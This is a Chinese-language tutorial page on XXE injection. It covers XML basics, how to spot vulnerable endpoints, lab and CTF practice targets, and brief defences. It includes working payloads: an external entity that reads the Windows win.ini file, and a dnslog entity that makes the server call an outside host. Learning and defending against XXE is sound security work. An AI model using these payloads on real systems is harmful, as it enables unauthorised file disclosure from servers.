当前位置: 首页 > news >正文

XXE漏洞

一、概述

1、XXE:XML外部实体注入攻击

2、XML:可扩展标记语言。

(1)没有固定标签,所有标签都可以自定义,但有限制规则。

(2)用于数据对的传输与存储,常被用于充当配置文件

推荐教程:XML 教程

(3)后缀名:*.xml

(4)语法规则:格式正确完整

3、XXE攻击原理:攻击者通过恶意的外部实体,当解析者解析包含恶意外部实体且未对其进行过滤,造成命令执行,目录遍历。

二、利用

1、存在:

  • 看URL是.ashx后缀
  • 存在明显的XML标签
  • 是POST请求,content-type:application/xml、text/xml、application/json(发现更改为application/xml看看)

2、限制条件:是否开启外部实体解析

3、攻击方式:有回显和无回显(盲攻击)

4、Payload:

#尝试,判断漏洞存在
<?xml version="1.0"?>
<!DOCTYPE info [
<!ENTITY xxe "你好" > ]>
<info>&xxe;</info>
#利用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)

(1)、修改payload

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE info [
<!ENTITY xxe SYSTEM
"http://dnslog.cn暂时域名" >
]>
<info>&xxe;</info>

(2)、回到dnslog网址看是否有域名解析了

6、练习(ctf题目):http://web.jarvisoj.com:9882/

7、思路

  • 无回显,BP抓包
  • 判断是否存在xxe漏洞
  • 深度利用

三、补充

1、工具:XXE injector

资料:https://www.cnblogs.com/AgainKjh/p/14639186.html

2、防御

  • 升级版本,禁止外部实体解析
  • 过滤用户提交的数据
http://www.lryc.cn/news/343515.html

相关文章:

  • [华为OD]C卷 BFS 亲子游戏 200
  • 大模型微调实战之强化学习 贝尔曼方程及价值函数(五)
  • 初探MFC程序混合使用QT
  • 【LeetCode题库】1068. 产品销售分析 I —— MySQL 性能提升,using()关键字
  • leetcode 1 ~ 100
  • 分享6个免费下载电子书的网站
  • typescript的入门到吐槽:看了typescript,发现前端真的卷,
  • 抖店商品详情API接口,商品上架(主图,价格,sku等属性,)item_get-获得抖店商品详情
  • STM32使用ADC单/多通道检测数据
  • Unity 性能优化之动态批处理(四)
  • Windows 11 系统安装时如何跳过联网和逃避微软账号登录
  • uniapp + vue3 使用axios
  • 关于前后端的参数传递
  • 华火电焰灶,科技打造“新”厨房
  • 普通人副业要趁早,5种靠谱且持久的赚钱副业
  • 【文献解析】3D高斯抛雪球是个什么玩意
  • 嘎嘎好用的虚拟键盘第二弹之中文输入法
  • vue3使用el-autocomplete请求远程数据
  • 【学习笔记】HarmonyOS 4.0 鸿蒙Next 应用开发--安装开发环境
  • 【PHP】计算两个时间戳之间相差的时间
  • Out-of-Distribution Detection with Semantic Mismatch under Masking
  • 嫦娥六号近月制动成功,建立月球基地又迈进一步!
  • 上位机图像处理和嵌入式模块部署(树莓派4b使用lua)
  • 分布式与一致性协议之ZAB协议(五)
  • 计算机毕业设计 | springboot+vue凌云在线阅读平台 线上读书系统(附源码)
  • ICode国际青少年编程竞赛- Python-1级训练场-综合训练1
  • 提示词工程入门-使用文心一言4.0-通义千问-GPT4-Claude3通用提示技巧测试
  • 损失函数详解
  • 算法提高之树的中心
  • 【Java基础】面向对象是什么